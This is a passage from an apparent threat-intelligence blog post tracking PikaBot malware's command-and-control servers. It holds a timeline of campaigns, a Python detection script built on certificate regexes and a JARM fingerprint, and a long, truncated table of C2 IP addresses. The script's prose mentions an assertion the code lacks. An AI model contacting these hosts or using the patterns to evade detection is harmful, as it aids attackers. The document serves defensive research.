13720, 13721, 13724, 13782\r\nand 13786.\r\nAs for many other malware families, we also collect the C2 servers by extracting the malware configuration from\r\nsamples. For PikaBot, this method complements the scan-based heuristics and improves our coverage of the C2 infrastructure.\r\nEvolution over the year\r\nSekoia TDR’s monitoring of the PikaBot infrastructure since it first emerged resulted in the collection of more than\r\n360 unique IP addresses used as C2 servers between February 2023 and early May 2024.\r\nOur tracking methods rely primarily on internet scan engines and on the extraction of PikaBot configurations from\r\ncollected samples. While the results presented in this report may not be exhaustive, we assess with high\r\nconfidence that our coverage is representative of the PikaBot C2 infrastructure, for the following reasons:\r\nOur monitoring aligns with the intelligence shared in open-source reporting, including reports by various\r\ncybersecurity vendors and researchers.\r\nThe appearance of new C2 servers over time coincides with the large PikaBot distribution campaigns,\r\nboth those observed by Sekoia and those reported in open source.\r\nFigure 15. Number of new PikaBot C2 servers detected by Sekoia.io per week (as of early May\r\n2024)\r\nRight after its emergence, no new PikaBot C2 servers were observed in the following months. We believe that PikaBot\r\nactivities may have slowed down, been limited or stopped completely in March and April 2023. TDR analysts\r\nassess that PikaBot was still in development at that time, and that the first distribution campaign operated by TA577 in\r\nFebruary 2023 served to test the malware.\r\nIn May 2023, PikaBot resurfaced, widely spread in (and limited to) several TA577 email phishing campaigns. The\r\nmalware was likely operational for the IAB group’s activities, and was possibly being updated with improved\r\nfunctionalities. 
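The tracking heuristic quoted above, implemented as a stand-alone check. This is an added example written for this page, not Sekoia’s tooling: it translates the regular expressions, the JARM value and the Server header from the scan-engine query into Python and runs them over the five May 2023 distinguished names listed in the text plus two constructed negatives. Two assumptions are made. First, the query keys on the certificate issuer fields; on a self-signed certificate the issuer equals the subject, which is why the subject DNs quoted in the text are used as input here. Second, the field names and syntax of the query look like those of Censys Search (the page does not name the engine), whose regular expressions must match the whole field, so re.fullmatch is used. One caveat a hunter should know: the organisation pattern admits only an “Inc.” suffix, although the text also mentions “LLC.” as a possible suffix, so a certificate with “Fumosity LLC.” would be missed by this query, as the last assertion below shows.

```python
import re

# Constants quoted in the Sekoia query: the JARM fingerprint unchanged since
# May 2023 and the HTTP Server header returned by the C2 servers.
PIKABOT_JARM = '21d19d00021d21d21c21d19d21d21dd188f9fdeea4d1b361be3a6ec494b2d2'
PIKABOT_SERVER_HEADER = 'nginx'

# The distinguished-name regular expressions from the query, one per attribute.
# They are applied with fullmatch, mirroring a scan engine whose regexes must
# cover the whole field. The organisation pattern only admits an ' Inc.' suffix
# (not the ' LLC.' suffix the text also mentions) and its unescaped '.' matches
# any character, exactly as written in the query.
DN_PATTERNS = {
    'C': re.compile('[A-Z]{2}'),
    'ST': re.compile('[A-Z]{2}'),
    'O': re.compile('[A-Z][a-z]{4,24}( [A-Z][a-z]{4,24})?( Inc.)?'),
    'CN': re.compile('[a-z]{6,32}[.][a-z]{2,8}'),
}


def parse_dn(dn):
    '''Turn 'C=NZ, ST=UN, O=Anaudia Aquose Inc., OU=Halutz, ...' into a dict.

    The string is split only at ', ' followed by an attribute type, so a value
    such as 'Anaudia Aquose Inc.' survives intact. Defanged dots ('[.]') in the
    common name are restored first.
    '''
    attrs = {}
    for part in re.split(', (?=[A-Z]{1,2}=)', dn.replace('[.]', '.')):
        key, _, value = part.partition('=')
        attrs[key.strip()] = value.strip()
    return attrs


def matches_pikabot_heuristic(record):
    '''Apply the whole query to one scan record.

    record is a dict with the certificate DN ('dn'), the JARM fingerprint
    ('jarm') and the HTTP Server header ('server'). Every DN regex must match,
    and the JARM and Server header must equal the values from the query.
    '''
    attrs = parse_dn(record['dn'])
    for attr, pattern in DN_PATTERNS.items():
        value = attrs.get(attr)
        if value is None or pattern.fullmatch(value) is None:
            return False
    return (record.get('jarm') == PIKABOT_JARM
            and record.get('server') == PIKABOT_SERVER_HEADER)


def hunt(records):
    '''Return the common names of all records flagged as PikaBot C2 candidates.'''
    return [parse_dn(r['dn'])['CN'] for r in records if matches_pikabot_heuristic(r)]


# Constructed sample: the five May 2023 distinguished names quoted in the text,
# paired with the JARM and Server header the query expects, plus two negatives.
SAMPLE_RECORDS = [
    {'dn': 'C=NZ, ST=UN, O=Anaudia Aquose Inc., OU=Halutz, L=Priorship, CN=lordless[.]name',
     'jarm': PIKABOT_JARM, 'server': 'nginx'},
    {'dn': 'C=AE, ST=BE, O=Fumosity Inc., OU=Abattised, L=Heptatonic Gallinazo, CN=resonancessewars[.]tires',
     'jarm': PIKABOT_JARM, 'server': 'nginx'},
    {'dn': 'C=AR, ST=QU, O=Grizzles Nonabrogable Inc., OU=Holohedral Croftland, '
           'L=Rehoused Functionaries, CN=alkaliesnonperspective[.]fish',
     'jarm': PIKABOT_JARM, 'server': 'nginx'},
    {'dn': 'C=FR, ST=LE, O=Breekless, OU=Athwart, L=Pathed, CN=demonising[.]li',
     'jarm': PIKABOT_JARM, 'server': 'nginx'},
    {'dn': 'C=GL, ST=LE, O=Speciology, OU=Mezquit, L=Acetylizer Unprayerful, CN=callipersoutane[.]com',
     'jarm': PIKABOT_JARM, 'server': 'nginx'},
    # Same DN shape, but the all-zero JARM of a host that answered none of the
    # TLS probes: the certificate alone is not enough, so not flagged.
    {'dn': 'C=FR, ST=LE, O=Breekless, OU=Athwart, L=Pathed, CN=demonising[.]li',
     'jarm': '0' * 62, 'server': 'nginx'},
    # Ordinary corporate certificate (constructed): multi-label CN with digits
    # and a hyphen, short second word in O. Not flagged.
    {'dn': 'C=US, ST=CA, O=Example Corp, OU=IT, L=San Jose, CN=mail-01.example.com',
     'jarm': PIKABOT_JARM, 'server': 'nginx'},
]

if __name__ == '__main__':
    for cn in hunt(SAMPLE_RECORDS):
        print('PikaBot C2 candidate:', cn)
```

Running the file prints the five common names from the text and nothing for the two negatives. When pointed at real scan output, feed the issuer DN string, the JARM and the Server header of each host into the same record shape; the check is deliberately as strict as the query, so broadening it (for example to accept the “LLC.” suffix) is a conscious trade of precision for recall.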
\r\nDuring the summer of 2023, there was no new activity publicly attributed to TA577. Meanwhile, the PikaBot\r\ninfrastructure remained almost unchanged, with only two new C2 servers detected by Sekoia.io in June and July,\r\nand none in August.\r\nAfter the summer holidays and the Qakbot takedown by an international law enforcement operation in August\r\n2023, PikaBot returned and was distributed in a new wave of fairly continuous campaigns between late September\r\nand the end of December. During this period, Sekoia detected an average of 20 new PikaBot C2 servers going\r\nonline each week.\r\nNotably, we observed a significant increase in new C2 servers between 18 and 23 December 2023, with more than 50 new\r\nservers deployed. This spike in activity occurred after a wide PikaBot distribution campaign in mid-December\r\nleveraging malvertising. At the time of writing, we could not confirm whether these two events are\r\ncorrelated. However, we can assume that the adoption of malvertising to propagate PikaBot resulted in a growing\r\nnumber of infected machines, which plausibly led the operator(s) to scale up the C2 infrastructure.\r\nThe distribution of PikaBot and the deployment of new infrastructure ceased in early January 2024. TDR analysts\r\nbelieve this break in PikaBot’s activities is related to the holidays in Russian-speaking Orthodox countries and the\r\ncelebration of Orthodox Christmas (7 January). The malware resurfaced a few weeks later, again with several TA577\r\nemail phishing campaigns. Distribution activities and the deployment of new C2 servers then progressively\r\ndeclined until April 2024.\r\nMonitoring PikaBot’s C2 infrastructure provides additional context on malware-related activities, including\r\nlarge distribution campaigns, possible vacation breaks, and development stages. 
Based on the infrastructure\r\ntracking and open-source reporting, Sekoia analysts assess with high confidence that TA577 is the primary, and\r\npossibly exclusive, user of the PikaBot malware, as its distribution campaigns align with the evolution of\r\nthe PikaBot C2 infrastructure.\r\nConclusion\r\nPikaBot is a sophisticated malware loader used by Initial Access Brokers since February 2023. Attackers\r\nemployed various techniques to distribute PikaBot, including phishing emails, malvertising, and multiple infection\r\nchains. The choice of distribution technique likely affected the scale of the respective PikaBot campaigns, as\r\nwas possibly the case in December 2023, when the spike in PikaBot infrastructure activity followed the use of\r\nmalvertising as a delivery technique.\r\nOpen-source reports indicate that successful PikaBot compromises often lead to the deployment of Black Basta\r\nransomware. The PikaBot loader represents a significant threat to organisations, which must prevent, detect and\r\nrespond to it quickly to mitigate its possible impact.\r\nSubstantial effort appears to be directed towards the continuous development of PikaBot. Maintaining multi-stage malware that employs numerous techniques to conceal itself, prevent its execution under specific\r\nconditions (anti-debugging, anti-analysis), and obfuscate its code and communications using algorithms that evolve\r\nover time typically requires a high level of expertise in malware development.\r\nThe apparent skill of the PikaBot developer(s), along with regular malware updates,\r\nsuggests that the threat is continuously evolving to evade detection by security operators and vendors. 
Close surveillance of the\r\nmalware’s evolution is therefore essential in order to prevent and detect it in time.\r\nSekoia.io analysts routinely monitor both emerging and established botnets and maintain close vigilance over the\r\nPikaBot threat.\r\nThank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications.\r\nYou can also contact us at tdr[at]sekoia.io for further discussions.\r\nIoCs\r\nThe list of IoCs is available on the Sekoia.io GitHub repository.\r\nIP address Port Valid from Valid until\r\n172.234.250.178 2222 2024-05-06 2024-06-05\r\n20.67.206.46 443 2024-04-24 2024-05-24\r\n172.233.155.253 2078 2024-04-05 2024-04-22\r\n172.233.221.61 5938 2024-04-04 2024-05-10\r\n213.199.41.33 13721 2024-03-26 2024-05-16\r\n194.233.91.144 5000 2024-03-26 2024-05-16\r\n158.220.95.214 5243 2024-03-26 2024-05-08\r\n84.247.157.112 13783 2024-03-26 2024-05-16\r\n172.232.208.90 2223 2024-03-26 2024-05-05\r\n158.220.95.215 5242 2024-03-26 2024-05-03\r\n64.23.199.206 1194 2024-03-26 2024-05-03\r\n4.175.178.149 443 2024-03-23 2024-04-22\r\n70.34.199.64 9785 2024-03-06 2024-04-05\r\n45.77.63.237 5632 2024-03-06 2024-04-05\r\n94.72.104.77 13724 2024-03-06 2024-04-05\r\n154.53.55.165 13783 2024-03-06 2024-04-05\r\n198.38.94.213 2224 2024-03-06 2024-04-05\r\n154.12.236.248 13786 2024-03-06 2024-04-05\r\n94.72.104.80 5000 2024-03-06 2024-04-05\r\n209.126.86.48 1194 2024-03-06 2024-04-05\r\n158.247.240.58 5632 2024-03-06 2024-04-05\r\n70.34.223.164 5000 2024-03-06 2024-04-05\r\n84.46.240.42 2083 2024-03-05 2024-04-04\r\n65.20.73.169 13783 2024-03-01 2024-03-31\r\n65.20.69.208 5000 2024-03-01 2024-03-31\r\n23.226.138.143 2083 2024-02-29 2024-03-30\r\n192.248.159.76 2222 2024-02-29 2024-03-30\r\n54.84.110.180 443 2024-02-21 
2024-03-22\r\n45.32.204.175 2222 2024-02-20 2024-03-21\r\n45.77.55.133 2078 2024-02-20 2024-03-21\r\n154.38.175.241 13721 2024-02-19 2024-03-23\r\n154.12.248.41 5000 2024-02-19 2024-03-23\r\n154.12.233.66 2224 2024-02-19 2024-03-30\r\n148.113.141.220 2224 2024-02-19 2024-03-23\r\n89.117.23.186 5632 2024-02-19 2024-03-30\r\n57.128.165.176 13721 2024-02-19 2024-03-30\r\n145.239.135.24 5243 2024-02-19 2024-03-30\r\n109.199.99.131 13721 2024-02-19 2024-03-23\r\n141.95.106.106 2967 2024-02-19 2024-03-23\r\n89.117.23.34 5938 2024-02-19 2024-03-23\r\n89.117.23.185 2221 2024-02-19 2024-03-30\r\n172.232.190.57 2224 2024-02-17 2024-03-23\r\n185.179.217.216 9785 2024-02-16 2024-03-23\r\n172.232.174.6 5242 2024-02-16 2024-03-23\r\n172.232.186.100 2083 2024-02-15 2024-03-23\r\n86.38.225.109 13724 2024-02-14 2024-03-21\r\n131.153.231.178 2221 2024-02-14 2024-03-20\r\n45.32.21.184 5242 2024-02-14 2024-03-20\r\n104.156.233.235 2226 2024-02-14 2024-03-21\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 22 of 38\n\n95.179.135.3 2225 2024-02-14 2024-03-20\r\n198.44.187.12 2224 2024-02-14 2024-03-23\r\n155.138.147.62 2223 2024-02-14 2024-03-20\r\n154.201.81.8 2967 2024-02-14 2024-03-15\r\n108.61.78.17 13783 2024-02-14 2024-03-20\r\n172.232.189.219 2224 2024-02-14 2024-03-23\r\n172.232.162.97 13783 2024-02-14 2024-03-23\r\n172.232.189.10 1194 2024-02-14 2024-03-23\r\n43.229.78.74 2226 2024-02-14 2024-03-15\r\n104.129.55.106 13783 2024-02-13 2024-03-30\r\n45.76.251.190 5631 2024-02-13 2024-03-21\r\n103.82.243.5 13785 2024-02-13 2024-03-30\r\n104.129.55.105 2223 2024-02-13 2024-03-30\r\n45.32.248.100 2226 2024-02-13 2024-03-21\r\n86.38.225.105 13721 2024-02-12 2024-03-30\r\n86.38.225.106 2221 2024-02-12 2024-03-30\r\n86.38.225.108 2226 2024-02-12 2024-03-19\r\n37.60.242.86 2967 2024-02-09 2024-03-23\r\n178.18.246.136 2078 2024-02-09 2024-03-30\r\n23.226.138.161 5242 2024-02-09 2024-03-23\r\n85.239.243.155 5000 2024-02-08 2024-03-30\r\n139.84.237.229 
2967 2024-02-08 2024-03-15\r\n95.179.191.137 5938 2024-02-08 2024-03-15\r\n158.220.80.157 9785 2024-02-08 2024-03-15\r\n158.220.80.167 2967 2024-02-08 2024-03-15\r\n65.20.66.218 5938 2024-02-08 2024-03-15\r\n37.60.242.85 9785 2024-02-08 2024-03-30\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 23 of 38\n\n104.129.55.103 2224 2024-02-08 2024-03-15\r\n104.129.55.104 2223 2024-02-08 2024-03-15\r\n78.47.233.121 443 2024-01-24 2024-02-23\r\n109.123.227.104 2221 2024-01-23 2024-03-17\r\n139.180.185.171 2222 2024-01-23 2024-03-17\r\n192.248.174.52 5631 2024-01-23 2024-03-17\r\n154.38.184.3 2223 2024-01-23 2024-03-17\r\n85.239.243.3 23399 2023-12-23 2024-01-29\r\n109.123.227.158 2223 2023-12-21 2024-01-29\r\n109.123.227.174 23399 2023-12-21 2024-01-29\r\n85.239.237.153 5632 2023-12-21 2024-01-28\r\n172.234.224.202 13785 2023-12-21 2024-01-20\r\n5.180.151.180 2224 2023-12-21 2024-01-29\r\n5.180.151.194 5631 2023-12-21 2024-01-29\r\n109.123.227.167 5938 2023-12-21 2024-01-29\r\n172.232.172.228 2221 2023-12-21 2024-01-20\r\n172.232.189.141 2078 2023-12-21 2024-01-20\r\n109.123.227.170 5632 2023-12-21 2024-01-29\r\n172.232.172.171 13721 2023-12-21 2024-01-20\r\n154.38.164.50 5243 2023-12-21 2024-01-28\r\n109.123.227.147 5243 2023-12-21 2024-01-29\r\n109.123.227.166 5938 2023-12-21 2024-01-29\r\n172.232.7.224 9785 2023-12-21 2024-01-20\r\n185.187.235.158 23399 2023-12-20 2024-01-29\r\n172.232.189.134 2221 2023-12-20 2024-01-27\r\n65.20.78.70 2967 2023-12-20 2024-01-19\r\n139.180.137.30 5000 2023-12-20 2024-01-19\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 24 of 38\n\n172.232.161.248 13783 2023-12-20 2024-01-19\r\n107.191.56.230 13783 2023-12-20 2024-01-19\r\n89.117.55.179 2083 2023-12-20 2024-01-28\r\n216.128.179.120 2967 2023-12-20 2024-01-19\r\n216.128.151.26 13782 2023-12-20 2024-01-27\r\n172.232.162.62 2083 2023-12-20 2024-01-19\r\n46.250.253.58 5243 2023-12-20 2024-01-27\r\n178.154.205.14 443 
2023-12-20 2024-01-19\r\n149.28.252.250 5000 2023-12-20 2024-01-27\r\n172.232.172.117 1194 2023-12-20 2024-01-19\r\n89.117.55.178 2083 2023-12-20 2024-01-28\r\n104.207.143.168 2222 2023-12-20 2024-01-27\r\n154.38.185.135 13782 2023-12-20 2024-01-27\r\n95.179.247.197 13782 2023-12-20 2024-01-19\r\n64.176.67.92 2078 2023-12-20 2024-01-19\r\n172.232.189.146 2078 2023-12-20 2024-01-19\r\n172.232.190.249 5631 2023-12-20 2024-01-19\r\n154.38.185.138 13786 2023-12-20 2024-01-28\r\n45.76.119.22 13724 2023-12-19 2024-01-18\r\n69.164.213.141 5631 2023-12-19 2024-01-18\r\n78.141.223.212 1194 2023-12-19 2024-01-25\r\n45.76.96.172 2223 2023-12-18 2024-01-25\r\n64.176.13.28 2083 2023-12-18 2024-01-25\r\n45.76.22.139 13786 2023-12-18 2024-01-25\r\n51.161.81.190 13721 2023-12-18 2024-02-29\r\n45.56.71.218 13724 2023-12-18 2024-01-26\r\n216.238.79.12 2221 2023-12-18 2024-01-25\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 25 of 38\n\n78.141.200.111 5938 2023-12-18 2024-01-25\r\n65.20.85.39 2967 2023-12-18 2024-01-25\r\n149.28.100.66 5243 2023-12-18 2024-01-25\r\n172.232.54.192 2224 2023-12-18 2024-01-26\r\n208.76.221.253 13724 2023-12-18 2024-01-25\r\n70.34.196.219 2226 2023-12-18 2024-01-25\r\n172.232.188.4 2226 2023-12-18 2024-01-26\r\n155.138.140.156 13720 2023-12-18 2024-01-25\r\n45.33.15.215 2967 2023-12-18 2024-01-26\r\n172.232.189.166 1194 2023-12-18 2024-01-26\r\n149.28.189.244 2222 2023-12-17 2024-01-23\r\n66.135.31.146 2078 2023-12-16 2024-01-15\r\n172.232.163.182 2222 2023-12-16 2024-01-23\r\n65.20.115.154 5243 2023-12-15 2024-01-22\r\n54.37.79.82 2223 2023-12-15 2024-01-21\r\n167.179.93.21 1194 2023-12-15 2024-01-22\r\n57.128.103.99 2078 2023-12-15 2024-01-21\r\n172.232.170.25 13724 2023-12-15 2024-01-23\r\n172.232.173.219 5938 2023-12-14 2024-01-22\r\n172.232.186.251 5632 2023-12-14 2024-01-23\r\n172.232.162.198 13721 2023-12-14 2024-01-23\r\n31.210.51.93 443 2023-12-14 2024-01-13\r\n149.28.17.176 1194 2023-12-13 
2024-01-19\r\n172.232.163.208 2224 2023-12-13 2024-01-20\r\n172.232.164.77 5000 2023-12-13 2024-01-20\r\n64.176.66.137 5000 2023-12-13 2024-01-19\r\n64.176.68.223 13785 2023-12-13 2024-01-19\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 26 of 38\n\n107.191.47.85 5243 2023-12-13 2024-01-19\r\n172.232.163.111 5938 2023-12-13 2024-01-20\r\n172.232.175.59 5938 2023-12-13 2024-01-20\r\n172.232.164.159 5632 2023-12-13 2024-01-20\r\n95.179.212.178 13782 2023-12-13 2024-01-19\r\n45.32.253.21 2083 2023-12-13 2024-01-19\r\n192.248.183.93 5632 2023-12-13 2024-01-19\r\n199.247.8.136 13786 2023-12-13 2024-01-19\r\n141.95.108.72 443 2023-12-12 2024-01-11\r\n155.138.203.158 1194 2023-12-11 2024-03-17\r\n65.20.98.24 13783 2023-12-11 2024-03-17\r\n65.20.82.254 5243 2023-12-11 2024-03-17\r\n109.123.227.54 13785 2023-12-11 2024-01-18\r\n154.38.184.5 9785 2023-12-11 2024-01-18\r\n66.42.80.169 5631 2023-12-11 2024-01-18\r\n109.123.227.50 13782 2023-12-11 2024-01-18\r\n158.220.90.199 2083 2023-12-09 2024-01-18\r\n45.137.192.63 23399 2023-12-08 2024-01-17\r\n31.220.96.162 2224 2023-12-08 2024-01-18\r\n161.97.98.95 2083 2023-12-08 2024-01-17\r\n158.220.103.150 5632 2023-12-08 2024-01-17\r\n45.32.188.56 2967 2023-12-07 2024-01-06\r\n192.248.151.140 23399 2023-12-07 2024-01-06\r\n64.176.225.21 2225 2023-12-07 2024-01-14\r\n45.137.192.84 2223 2023-12-07 2024-01-17\r\n45.32.235.46 5242 2023-12-07 2024-01-06\r\n70.34.207.219 5000 2023-12-07 2024-01-06\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 27 of 38\n\n139.84.235.8 2225 2023-12-07 2024-01-06\r\n64.176.218.254 9785 2023-12-07 2024-01-14\r\n46.250.241.191 13721 2023-12-07 2024-01-15\r\n216.128.136.231 13786 2023-12-07 2024-01-06\r\n108.61.224.209 2967 2023-12-07 2024-01-06\r\n46.250.241.197 5000 2023-12-07 2024-01-15\r\n65.20.74.26 2221 2023-12-07 2024-01-14\r\n158.220.90.198 2083 2023-12-07 2024-01-18\r\n65.20.77.81 5242 2023-12-06 
2024-01-05\r\n207.148.103.233 2967 2023-12-06 2024-01-05\r\n199.247.15.68 5938 2023-12-06 2024-01-13\r\n78.141.222.198 13786 2023-12-06 2024-01-05\r\n45.63.26.148 2224 2023-12-06 2024-01-05\r\n57.128.83.129 2078 2023-12-01 2024-01-21\r\n45.76.98.136 2221 2023-12-01 2024-01-22\r\n154.211.12.126 2967 2023-12-01 2024-02-05\r\n141.95.108.252 2078 2023-12-01 2024-01-21\r\n57.128.109.221 13724 2023-12-01 2024-01-21\r\n57.128.164.11 5242 2023-12-01 2024-01-21\r\n139.99.222.29 5631 2023-12-01 2024-01-14\r\n57.128.108.132 13785 2023-12-01 2024-01-21\r\n172.232.173.141 2226 2023-12-01 2024-01-23\r\n51.83.253.102 9785 2023-12-01 2024-01-21\r\n46.250.241.188 1194 2023-11-18 2023-12-25\r\n207.148.93.23 2221 2023-11-17 2023-12-24\r\n64.176.190.166 2222 2023-11-17 2023-12-24\r\n45.32.244.94 9785 2023-11-17 2023-12-24\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 28 of 38\n\n155.138.132.163 13786 2023-11-15 2023-12-21\r\n158.247.196.155 9785 2023-11-15 2023-12-21\r\n45.32.232.31 13782 2023-11-15 2023-12-21\r\n45.33.69.35 5242 2023-11-15 2023-12-22\r\n172.232.189.83 5243 2023-11-15 2023-12-25\r\n97.107.131.224 13782 2023-11-15 2023-12-25\r\n172.232.189.84 23399 2023-11-15 2023-12-22\r\n70.34.223.131 5938 2023-11-13 2023-12-19\r\n139.180.168.216 13786 2023-11-13 2023-12-20\r\n95.179.182.147 2078 2023-11-13 2023-11-23\r\n167.179.100.211 2221 2023-11-13 2023-12-21\r\n95.179.214.49 5242 2023-11-13 2023-12-20\r\n70.34.242.159 5243 2023-11-13 2023-12-20\r\n154.12.255.254 23399 2023-11-09 2023-12-17\r\n65.20.77.19 5242 2023-11-09 2023-12-16\r\n158.247.215.68 2225 2023-11-09 2023-12-16\r\n95.179.206.77 13782 2023-11-09 2023-12-16\r\n217.69.14.55 13724 2023-11-09 2023-12-16\r\n149.28.49.170 23399 2023-11-09 2023-12-16\r\n158.247.246.182 2226 2023-11-07 2023-12-14\r\n158.247.197.73 23399 2023-11-06 2023-12-06\r\n104.238.144.171 2221 2023-11-06 2023-12-06\r\n136.244.98.80 13783 2023-11-06 2023-12-14\r\n198.13.58.126 2223 2023-11-06 
2023-12-06\r\n45.76.103.152 13720 2023-11-06 2023-12-19\r\n65.20.84.3 2221 2023-11-06 2023-12-06\r\n149.248.53.65 2221 2023-11-06 2023-12-14\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 29 of 38\n\n65.20.84.254 13783 2023-11-06 2023-12-06\r\n207.246.111.127 13786 2023-11-06 2023-12-14\r\n158.247.202.180 13783 2023-11-06 2023-12-06\r\n95.179.141.41 1194 2023-11-04 2023-12-10\r\n167.179.103.206 2083 2023-11-03 2023-12-09\r\n45.32.140.39 2078 2023-11-03 2023-12-09\r\n45.33.85.73 13721 2023-11-01 2023-12-08\r\n172.233.154.98 13785 2023-11-01 2023-12-08\r\n172.233.185.220 5242 2023-11-01 2023-12-08\r\n104.237.145.83 2083 2023-11-01 2023-12-08\r\n50.116.54.138 13724 2023-10-31 2023-12-08\r\n51.68.144.135 2083 2023-10-31 2023-12-08\r\n140.82.56.164 5632 2023-10-31 2023-11-30\r\n139.144.97.180 2224 2023-10-31 2023-11-30\r\n104.200.28.75 2222 2023-10-30 2023-12-08\r\n202.182.121.203 2083 2023-10-30 2023-11-29\r\n65.20.82.17 5938 2023-10-30 2023-12-06\r\n158.247.210.203 2222 2023-10-30 2023-11-29\r\n172.234.16.175 2083 2023-10-30 2023-12-06\r\n185.106.94.167 5631 2023-10-28 2023-12-05\r\n45.79.174.92 1194 2023-10-28 2023-12-05\r\n139.144.31.103 1194 2023-10-28 2023-12-04\r\n216.128.176.211 2222 2023-10-27 2023-12-04\r\n172.234.29.13 2224 2023-10-24 2023-12-01\r\n198.244.141.4 9785 2023-10-24 2023-12-03\r\n172.233.187.145 2226 2023-10-24 2023-12-02\r\n139.144.215.192 13785 2023-10-24 2023-11-30\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 30 of 38\n\n172.233.186.50 5632 2023-10-24 2023-11-30\r\n45.33.76.163 2223 2023-10-24 2023-12-01\r\n45.79.147.119 9785 2023-10-24 2023-12-01\r\n172.232.188.124 2083 2023-10-24 2023-11-23\r\n217.69.8.229 13782 2023-10-24 2023-11-30\r\n139.177.198.199 2226 2023-10-24 2023-12-02\r\n172.232.24.58 2226 2023-10-24 2023-11-30\r\n176.58.102.36 2225 2023-10-24 2023-11-30\r\n15.235.143.190 2224 2023-10-23 2023-12-06\r\n85.215.218.128 5243 2023-10-23 
2023-11-29\r\n103.231.93.15 5631 2023-10-23 2023-12-03\r\n155.138.156.94 5243 2023-10-23 2023-11-29\r\n154.12.252.84 23399 2023-10-23 2023-12-18\r\n196.218.123.202 13783 2023-10-23 2024-03-23\r\n156.251.137.134 5000 2023-10-23 2023-11-29\r\n51.68.146.19 5242 2023-10-23 2023-12-06\r\n139.99.216.90 13720 2023-10-23 2023-12-06\r\n34.135.79.247 443 2023-10-21 2023-11-20\r\n109.107.182.12 443 2023-10-20 2023-11-19\r\n109.107.182.13 443 2023-10-20 2023-11-19\r\n109.107.182.17 443 2023-10-20 2023-11-19\r\n109.107.182.18 443 2023-10-20 2023-11-19\r\n109.107.182.15 443 2023-10-20 2023-11-19\r\n109.107.182.14 443 2023-10-20 2023-11-19\r\n109.107.182.16 443 2023-10-20 2023-11-19\r\n109.107.182.10 443 2023-10-19 2023-11-26\r\n109.107.182.11 443 2023-10-19 2023-11-26\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 31 of 38\n\n109.107.182.19 443 2023-10-19 2023-11-18\r\n91.215.85.216 443 2023-10-18 2023-11-25\r\n91.215.85.154 443 2023-10-18 2023-11-25\r\n91.215.85.197 443 2023-10-18 2023-11-26\r\n85.106.94.167 5631 2023-10-17 2023-11-16\r\n185.106.94.177 13721 2023-10-17 2023-11-23\r\n185.106.94.152 13720 2023-10-17 2023-11-23\r\n80.85.140.43 9785 2023-10-17 2023-11-24\r\n80.85.140.152 5938 2023-10-11 2023-11-24\r\n78.128.112.208 443 2023-10-11 2023-11-24\r\n88.214.27.74 443 2023-10-11 2023-11-23\r\n185.106.94.174 5000 2023-10-11 2023-11-23\r\n45.182.189.105 443 2023-10-11 2023-11-23\r\n94.16.122.250 2078 2023-10-09 2023-10-19\r\n94.228.169.221 2083 2023-10-09 2023-10-19\r\n45.131.108.250 1194 2023-10-04 2023-11-03\r\n144.64.204.81 2078 2023-10-04 2023-11-03\r\n102.129.139.65 32999 2023-10-04 2023-11-12\r\n79.141.175.96 2078 2023-10-03 2023-11-02\r\n209.126.9.47 2078 2023-10-03 2023-11-02\r\n167.86.96.3 2222 2023-10-03 2023-11-02\r\n38.242.240.28 1194 2023-10-03 2023-11-13\r\n192.254.69.35 2078 2023-10-02 2023-10-12\r\n104.243.45.170 2222 2023-10-02 2023-10-12\r\n154.92.19.139 2222 2023-10-01 2024-01-14\r\n15.235.47.206 13783 2023-10-01 
2023-12-08\r\n15.235.202.109 2226 2023-10-01 2023-12-08\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 32 of 38\n\n137.220.55.190 2223 2023-10-01 2023-12-27\r\n65.20.78.68 13721 2023-10-01 2023-12-21\r\n70.34.209.101 13720 2023-10-01 2023-12-27\r\n158.247.253.155 2225 2023-10-01 2023-12-27\r\n15.235.45.155 2221 2023-10-01 2023-12-08\r\n15.235.47.80 23399 2023-10-01 2023-12-08\r\n64.176.67.194 2967 2023-10-01 2023-10-31\r\n51.68.147.114 2083 2023-10-01 2023-12-08\r\n154.221.30.136 13724 2023-10-01 2024-03-17\r\n64.176.5.228 13783 2023-10-01 2023-12-21\r\n210.243.8.247 23399 2023-10-01 2024-03-17\r\n51.79.143.215 13783 2023-10-01 2023-12-08\r\n51.195.232.97 13782 2023-10-01 2023-12-16\r\n154.61.75.156 2078 2023-10-01 2024-01-20\r\n139.180.216.25 2967 2023-10-01 2023-12-27\r\n172.233.156.100 13721 2023-10-01 2023-12-28\r\n188.26.127.4 13785 2023-10-01 2023-12-09\r\n15.235.44.231 5938 2023-10-01 2023-12-08\r\n192.9.135.73 1194 2023-09-25 2024-03-23\r\n148.153.34.82 2078 2023-09-25 2023-11-29\r\n135.125.124.72 2078 2023-09-25 2023-11-06\r\n24.199.109.6 2222 2023-07-24 2023-08-10\r\n8.20.255.249 2078 2023-06-19 2023-08-24\r\n185.87.148.132 1194 2023-05-22 2023-06-21\r\n89.116.131.40 2222 2023-05-22 2023-06-21\r\n85.215.162.167 2078 2023-05-21 2023-07-06\r\n154.80.229.112 2078 2023-05-21 2023-07-06\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 33 of 38\n\n67.21.33.208 2078 2023-05-21 2023-06-20\r\n67.21.33.188 2222 2023-05-21 2023-06-20\r\n45.195.200.116 2078 2023-05-21 2023-06-20\r\n91.134.126.43 1194 2023-05-17 2023-06-16\r\n94.199.173.6 2222 2023-05-17 2023-06-16\r\n154.80.229.76 1194 2023-05-17 2023-06-16\r\n45.154.24.57 2078 2023-05-17 2023-08-30\r\n45.85.235.39 2078 2023-05-17 